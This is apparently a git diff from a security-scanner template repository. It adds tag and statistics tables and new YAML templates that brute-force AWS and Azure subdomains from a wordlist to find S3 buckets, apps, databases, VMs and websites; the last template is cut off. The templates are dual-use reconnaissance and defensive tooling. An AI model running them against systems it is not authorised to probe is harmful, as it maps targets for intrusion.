+| seber | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| barco | 1 | | | | | | | | | +| squidex.io | 1 | | | | | | | | | +| fe | 1 | | | | | | | | | +| buddypress | 1 | | | | | | | | | +| spreadsheet-reader | 1 | | | | | | | | | +| kubeoperator | 1 | | | | | | | | | +| symmetricom | 1 | | | | | | | | | +| easyimage | 1 | | | | | | | | | +| macc2 | 1 | | | | | | | | | +| karma_project | 1 | | | | | | | | | +| shirnecms | 1 | | | | | | | | | +| post-status-notifier-lite | 1 | | | | | | | | | +| amentotech | 1 | | | | | | | | | +| blogmarks | 1 | | | | | | | | | +| videousermanuals | 1 | | | | | | | | | +| biotime | 1 | | | | | | | | | +| stageshow_project | 1 | | | | | | | | | +| unibox | 1 | | | | | | | | | +| report | 1 | | | | | | | | | +| spx-php | 1 | | | | | | | | | +| bibliopac | 1 | | | | | | | | | +| zaver_project | 1 | | | | | | | | | +| alma | 1 | | | | | | | | | +| okidoki | 1 | | | | | | | | | +| phoenix | 1 | | | | | | | | | +| mini_httpd | 1 | | | | | | | | | +| carrdco | 1 | | | | | | | | | +| pypicloud | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| systeminformation | 1 | | | | | | | | | +| jcms | 1 | | | | | | | | | +| flower | 1 | | | | | | | | | +| fandom | 1 | | | | | | | | | +| webassembly | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| tiempocom | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| clusterdafrica | 1 | | | | | | | | | +| nevma | 1 | | | | | | | | | +| colourlovers | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| peter_hocherl | 1 | | | | | | | | | +| marmoset | 1 | | | | | | | | | +| angtech | 1 | | | | | | | | | +| gettr | 1 | | | | | | | | | +| flureedb | 1 | | | | | | | | | +| software.realtyna | 1 | | | | | | | | | +| pendinginstallvzw | 1 | | | | | | | | | +| secsslvpn | 1 | | | | | | | | | +| online_security_guards_hiring_system_project | 1 | | | | | | | | | +| htmlcoderhelper | 1 | | | | | | | | | +| docebo | 1 | | | | | | | | | +| remedy | 1 | | | | | | | | | +| requests-baskets | 1 | | | | | | | | | +| ubigeo_de_peru_para_woocommerce_project | 1 | | | | | | | | | +| joomlanook | 1 | | | | | | | | | +| g_auto-hyperlink_project | 1 | | | | | | | | | +| sygnoos | 1 | | | | | | | | | +| mismatched | 1 | | | | | | | | | +| h-sphere | 1 | | | | | | | | | +| csa | 1 | | | | | | | | | +| caton | 1 | | | | | | | | | +| angularjs | 1 | | | | | | | | | +| h5s | 1 | | | | | | | | | +| tildezone-mastodon-instance | 1 | | | | | | | | | +| wireclub | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| pingdom | 1 | | | | | | | | | +| medium | 1 | | | | | | | | | +| sungrow | 1 | | | | | | | | | +| 360 | 1 | | | | | | | | | +| xinuos | 1 | | | | | | | | | +| justwriting_project | 1 | | | | | | | | | +| routers | 1 | | | | | | | | | +| mobotix | 1 | | | | | | | | | +| prestahome | 1 | | | | | | | | | +| permissions | 1 | | | | | | | | | +| unleashed | 1 | | | | | | | | | +| openv500 | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| twisted | 1 | | | | | | | | | +| looneytunables | 1 | | | | | | | | | +| craft_cms | 1 | | | | | | | | | +| geosolutionsgroup | 1 | | | | | | | | | +| bblog-ru | 1 | | | | | | | | | +| social-msdn | 1 | | | | | | | | | +| flatnux | 1 | | | | | | | | | +| podlove | 1 | | | | | | | | | +| powertekpdus | 1 | | | | | | | | | +| cx | 1 | | | | | | | | | +| karabin | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| knowledgetree | 1 | | | | | | | | | +| appian | 1 | | | | | | | | | +| sanhui-smg | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| thetattooforum | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| nimplant | 1 | | | | | | | | | +| roxy-wi | 1 | | | | | | | | | +| openframe | 1 | | | | | | | | | +| biolink | 1 | | | | | | | | | +| gnuboard5 | 1 | | | | | | | | | +| interactsh | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| hcommonssocial-mastodon-instance | 1 | | | | | | | | | +| phpsysinfo | 1 | | | | | | | | | +| login-bypass | 1 | | | | | | | | | +| kramerav | 1 | | | | | | | | | +| bws-custom-search | 1 | | | | | | | | | +| alltube | 1 | | | | | | | | | +| mgt-commerce | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| kaes | 1 | | | | | | | | | +| quilium | 1 | | | | | | | | | +| newsscript | 1 | | | | | | | | | +| zapier | 1 | | | | | | | | | +| audiocode | 1 | | | | | | | | | +| graphite_project | 1 | | | | | | | | | +| maillist | 1 | | | | | | | | | +| yiiframework | 1 | | | | | | | | | +| mapmytracks | 1 | | | | | | | | | +| skeb | 1 | | | | | | | | | +| maianscriptworld | 1 | | | | | | | | | +| jejapl | 1 | | | | | | | | | +| naver | 1 | | | | | | | | | +| media | 1 | | | | | | | | | +| mastodonchasedemdev-mastodon-instance | 1 | | | | | | | | | +| jobsearch | 1 | | | | | | | | | +| mcloud | 1 | | | | | | | | | +| coderwall | 1 | | | | | | | | | +| binance | 1 | | | | | | | | | +| telaen_project | 1 | | | | | | | | | +| rudderstack | 1 | | | | | | | | | +| 3dtoday | 1 | | | | | | | | | +| fatwire | 1 | | | | | | | | | +| emulator | 1 | | | | | | | | | +| alquistai | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| instructure | 1 | | | | | | | | | +| cookex | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| 99robots | 1 | | | | | | | | | +| html2pdf | 1 | | | | | | | | | +| backup-guard | 1 | | | | | | | | | +| intelx | 1 | | | | | | | | | +| jalios | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| axyom | 1 | | | | | | | | | +| coinlayer | 1 | | | | | | | | | +| streamelements | 1 | | | | | | | | | +| researchgate | 1 | | | | | | | | | +| cowboys4angels | 1 | | | | | | | | | +| fujitsu | 1 | | | | | | | | | +| jbpm | 1 | | | | | | | | | +| gryphonconnect | 1 | | | | | | | | | +| hdnetwork | 1 | | | | | | | | | +| ap-pricing-tables-lite | 1 | | | | | | | | | +| booth | 1 | | | | | | | | | +| nnru | 1 | | | | | | | | | +| monday | 1 | | | | | | | | | +| web3storage | 1 | | | | | | | | | +| albicla | 1 | | | | | | | | | +| codepen | 1 | | | | | | | | | +| joomlashowroom | 1 | | | | | | | | | +| wptrafficanalyzer | 1 | | | | | | | | | +| smule | 1 | | | | | | | | | +| liftoffsoftware | 1 | | | | | | | | | +| altenergy | 1 | | | | | | | | | +| ismygirl | 1 | | | | | | | | | +| smartypantsplugins | 1 | | | | | | | | | +| iclock | 1 | | | | | | | | | +| jasperserver | 1 | | | | | | | | | +| vmstio-mastodon-instance | 1 | | | | | | | | | +| nconf | 1 | | | | | | | | | +| webtoprint | 1 | | | | | | | | | +| lightdash | 1 | | | | | | | | | +| pyproject | 1 | | | | | | | | | +| motokiller | 1 | | | | | | | | | +| pettingzooco-mastodon-instance | 1 | | | | | | | | | +| shortcode | 1 | | | | | | | | | +| siebel | 1 | | | | | | | | | +| federatedpress-mastodon-instance | 1 | | | | | | | | | +| bws-social-login | 1 | | | | | | | | | +| page-layout-builder_project | 1 | | | | | | | | | +| nimsoft | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| impala | 1 | | | | | | | | | +| mapstodonspace-mastodon-instance | 1 | | | | | | | | | +| runcloud | 1 | | | | | | | | | +| sock | 1 | | | | | | | | | +| joomsport-sports-league-results-management | 1 | | | | | | | | | +| vite | 1 | | | | | | | | | +| contentify | 1 | | | | | | | | | +| sms | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| zerodium | 1 | | | | | | | | | +| eclipsebirt | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| controlled-admin-access | 1 | | | | | | | | | +| bws-pdf-print | 1 | | | | | | | | | +| wpvivid | 1 | | | | | | | | | +| scalar | 1 | | | | | | | | | +| bible | 1 | | | | | | | | | +| webgrind | 1 | | | | | | | | | +| piano | 1 | | | | | | | | | +| weebly | 1 | | | | | | | | | +| tengine | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| sercomm | 1 | | | | | | | | | +| gocron | 1 | | | | | | | | | +| navicat | 1 | | | | | | | | | +| prose | 1 | | | | | | | | | +| foursquare | 1 | | | | | | | | | +| magix | 1 | | | | | | | | | +| pie | 1 | | | | | | | | | +| jedox | 1 | | | | | | | | | +| shesfreaky | 1 | | | | | | | | | +| wp-upg | 1 | | | | | | | | | +| niagara | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| smartofficepayroll | 1 | | | | | | | | | +| smelsy | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| payeezy | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| grupposcai | 1 | | | | | | | | | +| improvmx | 1 | | | | | | | | | +| zeta-producer | 1 | | | | | | | | | +| hestiacp | 1 | | | | | | | | | +| esocks5 | 1 | | | | | | | | | +| twitcasting | 1 | | | | | | | | | +| launchdarkly | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| public_knowledge_project | 1 | | | | | | | | | +| phpMyChat | 1 | | | | | | | | | +| proxmox | 1 | | | | | | | | | +| amt | 1 | | | | | | | | | +| konga_project | 1 | | | | | | | | | +| helmet_store_showroom_project | 1 | | | | | | | | | +| mycloud | 1 | | | | | | | | | +| nextgen | 1 | | | | | | | | | +| thecatapi | 1 | | | | | | | | | +| flir-ax8 | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| formalms | 1 | | | | | | | | | +| wykop | 1 | | | | | | | | | +| fortiportal | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| alcoda | 1 | | | | | | | | | +| easync-booking | 1 | | | | | | | | | +| taskrabbit | 1 | | | | | | | | | +| usersultra | 1 | | | | | | | | | +| kramer | 1 | | | | | | | | | +| stestr | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| systemmanager | 1 | | | | | | | | | +| namedprocess | 1 | | | | | | | | | +| farkascity | 1 | | | | | | | | | +| js-analyse | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| viaware | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| joomlaworks | 1 | | | | | | | | | +| smartupload | 1 | | | | | | | | | +| americanthinker | 1 | | | | | | | | | +| commonsbooking | 1 | | | | | | | | | +| mobileviewpoint | 1 | | | | | | | | | +| franklinfueling | 1 | | | | | | | | | +| properties | 1 | | | | | | | | | +| binom | 1 | | | | | | | | | +| npmjs | 1 | | | | | | | | | +| suzuri | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| mastoai | 1 | | | | | | | | | +| bws-sender | 1 | | | | | | | | | +| wpchill | 1 | | | | | | | | | +| adminset | 1 | | | | | | | | | +| apex-legends | 1 | | | | | | | | | +| imageshack | 1 | | | | | | | | | +| wpmanageninja | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| envoy | 1 | | | | | | | | | +| issuu | 1 | | | | | | | | | +| teamwork | 1 | | | | | | | | | +| adoptapet | 1 | | | | | | | | | +| cutesoft | 1 | | | | | | | | | +| biostar2 | 1 | | | | | | | | | +| kodi | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| mix | 1 | | | | | | | | | +| theme-fusion | 1 | | | | | | | | | +| admin-bypass | 1 | | | | | | | | | +| digitalspy | 1 | | | | | | | | | +| f3 | 1 | | | | | | | | | +| openssl | 1 | | | | | | | | | +| mining | 1 | | | | | | | | | +| wp-autosuggest | 1 | | | | | | | | | +| syncthing | 1 | | | | | | | | | +| oturia | 1 | | | | | | | | | +| helmet | 1 | | | | | | | | | +| indegy | 1 | | | | | | | | | +| perfsonar | 1 | | | | | | | | | +| easyen | 1 | | | | | | | | | +| xintianqing | 1 | | | | | | | | | +| jvideodirect | 1 | | | | | | | | | +| locklizard | 1 | | | | | | | | | +| secnet-ac | 1 | | | | | | | | | +| currencyfreaks | 1 | | | | | | | | | +| wagtail | 1 | | | | | | | | | +| sensei-lms | 1 | | | | | | | | | +| h2c | 1 | | | | | | | | | +| mspcontrol | 1 | | | | | | | | | +| ppfeufer | 1 | | | | | | | | | +| portrait-archiv-shop | 1 | | | | | | | | | +| repeater | 1 | | | | | | | | | +| asa | 1 | | | | | | | | | +| powertek | 1 | | | | | | | | | +| formcraft3 | 1 | | | | | | | | | +| 247sports | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| narnoo-distributor | 1 | | | | | | | | | +| rconfig.exposure | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| solari | 1 | | | | | | | | | +| fortra | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| opensso | 1 | | | | | | | | | +| speedtest | 1 | | | | | | | | | +| multilaser | 1 | | | | | | | | | +| cal | 1 | | | | | | | | | +| graphicssocial-mastodon-instance | 1 | | | | | | | | | +| uservoice | 1 | | | | | | | | | +| telosalliance | 1 | | | | | | | | | +| ljapps | 1 | | | | | | | | | +| smart-manager-for-wp-e-commerce | 1 | | | | | | | | | +| opms | 1 | | | | | | | | | +| master | 1 | | | | | | | | | +| netris | 1 | | | | | | | | | +| knr-author-list-widget | 1 | | | | | | | | | +| jivesoftware | 1 | | | | | | | | | +| themefusion | 1 | | | | | | | | | +| graphpaperpress | 1 | | | | | | | | | +| flyteconsole | 1 | | | | | | | | | +| darktrace | 1 | | | | | | | | | +| fortimanager | 1 | | | | | | | | | +| zblog | 1 | | | | | | | | | +| savepage | 1 | | | | | | | | | +| kaseya | 1 | | | | | | | | | +| zendframework | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| accent | 1 | | | | | | | | | +| coinranking | 1 | | | | | | | | | +| super-socializer | 1 | | | | | | | | | +| justforfans | 1 | | | | | | | | | +| tekon | 1 | | | | | | | | | +| viper | 1 | | | | | | | | | +| weberr | 1 | | | | | | | | | +| parler-archived-posts | 1 | | | | | | | | | +| osu | 1 | | | | | | | | | +| acquia | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| intellislot | 1 | | | | | | | | | +| steemit | 1 | | | | | | | | | +| livebos | 1 | | | | | | | | | +| bws-pinterest | 1 | | | | | | | | | +| dogtagpki | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| yoast | 1 | | | | | | | | | +| the-plus-addons-for-elementor | 1 | | | | | | | | | +| crypto | 1 | | | | | | | | | +| uberflip | 1 | | | | | | | | | +| AlphaWeb | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| airnotifier | 1 | | | | | | | | | +| gargoyle | 1 | | | | | | | | | +| stridercd | 1 | | | | | | | | | +| ebird | 1 | | | | | | | | | +| if_surfalert_project | 1 | | | | | | | | | +| kotburger | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| khodrochi | 1 | | | | | | | | | +| siterecovery | 1 | | | | | | | | | +| kipin | 1 | | | | | | | | | +| ignition | 1 | | | | | | | | | +| ifttt | 1 | | | | | | | | | +| thinvnc | 1 | | | | | | | | | +| arcserve | 1 | | | | | | | | | +| intellifuel | 1 | | | | | | | | | +| vcloud | 1 | | | | | | | | | +| wget | 1 | | | | | | | | | +| iwork | 1 | | | | | | | | | +| thoughtworks | 1 | | | | | | | | | +| dateinasia | 1 | | | | | | | | | +| codementor | 1 | | | | | | | | | +| lacie | 1 | | | | | | | | | +| linktree | 1 | | | | | | | | | +| wpdownloadmanager | 1 | | | | | | | | | +| bologer | 1 | | | | | | | | | +| onion | 1 | | | | | | | | | +| exagrid | 1 | | | | | | | | | +| imgbb | 1 | | | | | | | | | +| teamtreehouse | 1 | | | | | | | | | +| ejs | 1 | | | | | | | | | +| wrteam | 1 | | | | | | | | | +| miniorange | 1 | | | | | | | | | +| x-ui | 1 | | | | | | | | | +| popl | 1 | | | | | | | | | +| wimkin-publicprofile | 1 | | | | | | | | | +| devalcms | 1 | | | | | | | | | +| opentext | 1 | | | | | | | | | +| notificationx | 1 | | | | | | | | | +| kavitareader | 1 | | | | | | | | | +| codekop | 1 | | | | | | | | | +| nport | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| deimosc2 | 1 | | | | | | | | | +| posthog | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| businesso | 1 | | | | | | | | | +| qvidium | 1 | | | | | | | | | +| imgur | 1 | | | | | | | | | +| oahms | 1 | | | | | | | | | +| dcrat | 1 | | | | | | | | | +| eleanor | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| powercommanager | 1 | | | | | | | | | +| dixell | 1 | | | | | | | | | +| kanev | 1 | | | | | | | | | +| opsgenie | 1 | | | | | | | | | +| jk | 1 | | | | | | | | | +| toyhouse | 1 | | | | | | | | | +| neo4j | 1 | | | | | | | | | +| engage | 1 | | | | | | | | | +| mgrng | 1 | | | | | | | | | +| mura | 1 | | | | | | | | | +| photostation | 1 | | | | | | | | | +| ektron | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| friendweb | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| webence | 1 | | | | | | | | | +| je_form_creator | 1 | | | | | | | | | +| tutorlms | 1 | | | | | | | | | +| setlistfm | 1 | | | | | | | | | +| juddi | 1 | | | | | | | | | +| fsecure | 1 | | | | | | | | | +| retool | 1 | | | | | | | | | +| mastodonbooksnet-mastodon-instance | 1 | | | | | | | | | +| gn-publisher | 1 | | | | | | | | | +| goliath | 1 | | | | | | | | | +| scanii | 1 | | | | | | | | | +| arcade | 1 | | | | | | | | | +| zentao | 1 | | | | | | | | | +| lispeltuut | 1 | | | | | | | | | +| atg | 1 | | | | | | | | | +| open-redirect | 1 | | | | | | | | | +| cmsmadesimple | 1 | | | | | | | | | +| webtitan | 1 | | | | | | | | | +| silenttrinity | 1 | | | | | | | | | +| mastodon-api | 1 | | | | | | | | | +| universal | 1 | | | | | | | | | +| appserv_open_project | 1 | | | | | | | | | +| inspireui | 1 | | | | | | | | | +| policja2009 | 1 | | | | | | | | | +| udemy | 1 | | | | | | | | | +| openautomationsoftware | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| enterprise | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| bagisto | 1 | | | | | | | | | +| jvtwitter | 1 | | | | | | | | | +| gmapfp | 1 | | | | | | | | | +| tufin | 1 | | | | | | | | | +| buzzfeed | 1 | | | | | | | | | +| agegate | 1 | | | | | | | | | +| phpunit_project | 1 | | | | | | | | | +| konghq | 1 | | | | | | | | | +| dozzle | 1 | | | | | | | | | +| pokemonshowdown | 1 | | | | | | | | | +| upward | 1 | | | | | | | | | +| homebridge | 1 | | | | | | | | | +| crowdin | 1 | | | | | | | | | +| pyspider | 1 | | | | | | | | | +| wowza | 1 | | | | | | | | | +| mod-jk | 1 | | | | | | | | | +| dissenter | 1 | | | | | | | | | +| mastodon-mastodon | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| disqus | 1 | | | | | | | | | +| verify | 1 | | | | | | | | | +| mastodon-climatejusticerocks | 1 | | | | | | | | | +| cminds | 1 | | | | | | | | | +| gamespot | 1 | | | | | | | | | +| joomlamart | 1 | | | | | | | | | +| mailhog | 1 | | | | | | | | | +| pronouny | 1 | | | | | | | | | +| rpcms | 1 | | | | | | | | | +| hivequeue | 1 | | | | | | | | | +| mms.pipp | 1 | | | | | | | | | +| u5cms | 1 | | | | | | | | | +| woo-order-export-lite | 1 | | | | | | | | | +| eventtickets | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| appium | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| xibocms | 1 | | | | | | | | | +| likebtn-like-button_project | 1 | | | | | | | | | +| sicom | 1 | | | | | | | | | +| warfareplugins | 1 | | | | | | | | | +| passwordmanager | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| raygun | 1 | | | | | | | | | +| privx | 1 | | | | | | | | | +| deltek | 1 | | | | | | | | | +| anobii | 1 | | | | | | | | | +| ufida | 1 | | | | | | | | | +| photoblocks | 1 | | | | | | | | | +| openhab | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| acketstorm | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| webnms | 1 | | | | | | | | | +| webtrees | 1 | | | | | | | | | +| lichess | 1 | | | | | | | | | +| untappd | 1 | | | | | | | | | +| droners | 1 | | | | | | | | | +| redux | 1 | | | | | | | | | +| bower | 1 | | | | | | | | | +| besu | 1 | | | | | | | | | +| interact | 1 | | | | | | | | | +| com-property | 1 | | | | | | | | | +| 2kblater | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| fullworksplugins | 1 | | | | | | | | | +| traggo | 1 | | | | | | | | | +| ilch | 1 | | | | | | | | | +| micro | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| redlion | 1 | | | | | | | | | +| wms | 1 | | | | | | | | | +| crunchrat | 1 | | | | | | | | | +| sentimente | 1 | | | | | | | | | +| openadmin | 1 | | | | | | | | | +| pluginops | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| filemage | 1 | | | | | | | | | +| commerce | 1 | | | | | | | | | +| bws-google-analytics | 1 | | | | | | | | | +| anti-plagiarism_project | 1 | | | | | | | | | +| pivotal_software | 1 | | | | | | | | | +| roxyfileman | 1 | | | | | | | | | +| beego | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| lean-value | 1 | | | | | | | | | +| johnmccollum | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| silverback | 1 | | | | | | | | | +| shortpixel-adaptive-images | 1 | | | | | | | | | +| patheon | 1 | | | | | | | | | +| rudloff | 1 | | | | | | | | | +| fortnite-tracker | 1 | | | | | | | | | +| xdebug | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| joobi | 1 | | | | | | | | | +| fhem | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| wsftp | 1 | | | | | | | | | +| diigo | 1 | | | | | | | | | +| fooplugins | 1 | | | | | | | | | +| whmcs | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| bokbot | 1 | | | | | | | | | +| nodebb | 1 | | | | | | | | | +| wattpad | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index ea5f0cfe78..adf1329c2f 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|-----------|-------|--------------|-------|-------------------|-------|----------|-------|------|-------| -| cve | 2271 | dhiyaneshdk | 1109 | http | 6856 | info | 3326 | file | 312 | -| panel | 1034 | dwisiswant0 | 800 | file | 312 | high | 1439 | dns | 18 | -| wordpress | 929 | daffainfo | 787 | workflows | 191 | medium | 1429 | | | -| xss | 845 | pikpikcu | 353 | network | 133 | critical | 906 | | | -| exposure | 833 | pussycat0x | 307 | ssl | 27 | low | 245 | | | -| wp-plugin | 811 | ritikchaddha | 293 | javascript | 20 | unknown | 32 | | | -| osint | 675 | pdteam | 283 | dns | 17 | | | | | -| tech | 645 | ricardomaia | 229 | headless | 10 | | | | | -| lfi | 614 | geeknik | 221 | code | 2 | | | | | -| edb | 598 | theamanrawat | 221 | contributors.json | 1 | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------| +| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 | +| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 | +| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | | +| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | | +| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | | +| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | | +| osint | 677 | pdteam | 286 | dns | 17 | | | | | +| tech | 649 | ricardomaia | 229 | headless | 11 | | | | | +| lfi | 619 | geeknik | 224 | code | 3 | | | | | +| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | | diff --git a/cloud/enum/aws-app-enum.yaml b/cloud/enum/aws-app-enum.yaml new file mode 100644 index 0000000000..ab7ed36795 --- /dev/null +++ b/cloud/enum/aws-app-enum.yaml @@ -0,0 +1,37 @@ +id: aws-app-enum + +info: + name: AWS Apps - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for AWS apps (WorkDocs, WorkMail, Connect, etc.) + metadata: + verified: true + max-request: 1 + tags: cloud,cloud-enum,aws + +self-contained: true + +variables: + BaseDNS: "awsapps.com" + +http: + - raw: + - | + GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1 + Host: {{wordlist}}.{{BaseDNS}} + + redirects: false + + attack: batteringram + threads: 10 + + matchers: + - type: status + name: "Registered AWS App" + status: + - 200 + - 302 + condition: or +# digest: 490a0046304402206cc21deaf3d479badf5b8b46dbe3448bd60ec76fc64503726d554051cca8a9bc02204dba37b6781d1c66eca341ac1c6c7a5041cfb376832d862700a864cc91af8870:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/aws-s3-bucket-enum.yaml b/cloud/enum/aws-s3-bucket-enum.yaml new file mode 100644 index 0000000000..7c692dda40 --- /dev/null +++ b/cloud/enum/aws-s3-bucket-enum.yaml @@ -0,0 +1,41 @@ +id: aws-s3-bucket-enum + +info: + name: AWS S3 Buckets - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for open and protected buckets in AWS S3 + metadata: + verified: true + max-request: 1 + tags: cloud,cloud-enum,aws + +self-contained: true + +variables: + BaseDNS: "s3.amazonaws.com" + +http: + - raw: + - | + GET http://{{wordlist}}.{{BaseDNS}} HTTP/1.1 + Host: {{wordlist}}.{{BaseDNS}} + + redirects: false + + attack: batteringram + threads: 10 + + matchers-condition: or + matchers: + - type: status + name: "Open AWS S3 Bucket" + status: + - 200 + + - type: status + name: "Protected AWS S3 Bucket" + status: + - 403 +# digest: 4b0a00483046022100c0cbb1d95cb9a7d7b9bd7a4bf578af739426ab59afa3faa001104c29c4ff999e022100cdfc9930e3c0ae01086792f1391ff33c22070722d3bd874d1e3f87f31c938a17:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml new file mode 100644 index 0000000000..8a3ec2887d --- /dev/null +++ b/cloud/enum/azure-db-enum.yaml @@ -0,0 +1,32 @@ +id: azure-db-enum + +info: + name: Azure Databases - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for Azure databases via their registered DNS names + metadata: + verified: true + max-request: 1 + tags: cloud,cloud-enum,azure + +self-contained: true + +variables: + BaseDNS: "database.windows.net" + +dns: + - name: "{{wordlist}}.{{BaseDNS}}" + type: A + class: inet + + recursion: true + + attack: batteringram + matchers: + - type: word + part: answer + words: + - "IN\tA" +# digest: 4a0a004730450221008d5f64c419db15f1c1bce4a802f395bdcc44847f878890831869236c37a1678002205d7502015cece8506d34b9c319643441e334856c7fd34e1baa70a6a6942f134e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml new file mode 100644 index 0000000000..7ed0d03f3c --- /dev/null +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -0,0 +1,65 @@ +id: azure-vm-cloud-enum + +info: + name: Azure Virtual Machines - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for Azure virtual machines via their registered DNS names. + metadata: + verified: true + tags: cloud,cloud-enum,azure + +self-contained: true + +variables: + BaseDNS: "cloudapp.azure.com" + regionname: + - eastasia + - southeastasia + - centralus + - eastus + - eastus2 + - westus + - northcentralus + - southcentralus + - northeurope + - westeurope + - japanwest + - japaneast + - brazilsouth + - australiaeast + - australiasoutheast + - southindia + - centralindia + - westindia + - canadacentral + - canadaeast + - uksouth + - ukwest + - westcentralus + - westus2 + - koreacentral + - koreasouth + - francecentral + - francesouth + - australiacentral + - australiacentral2 + - southafricanorth + - southafricawest + +dns: + - name: "{{wordlist}}.{{regionname}}.{{BaseDNS}}" + type: A + class: inet + + recursion: true + + attack: batteringram + + matchers: + - type: word + part: answer + words: + - "IN\tA" +# digest: 4b0a004830460221008d223bfdb3585e335e8282ca206945a6f7704dab4a2899d3410229bf0db7132d022100b9de9af2b393a559575b67a5b25b6334fe8cddd1ceed5059ee634dc3b0292d50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/cloud/enum/azure-website-enum.yaml b/cloud/enum/azure-website-enum.yaml new file mode 100644 index 0000000000..94737b9889 --- /dev/null +++ b/cloud/enum/azure-website-enum.yaml @@ -0,0 +1,36 @@ +id: azure-website-enum + +info: + name: Azure Websites - Cloud Enumeration + author: initstring + severity: info + description: | + Searches for Azure websites that are registered and responding. + metadata: + verified: true + tags: cloud,azure + +self-contained: true + +variables: + BaseDNS: "azurewebsites.net" + +http: + - raw: + - | + GET https://{{wordlist}}.{{BaseDNS}} HTTP/1.1 + Host: {{wordlist}}.{{BaseDNS}} + + 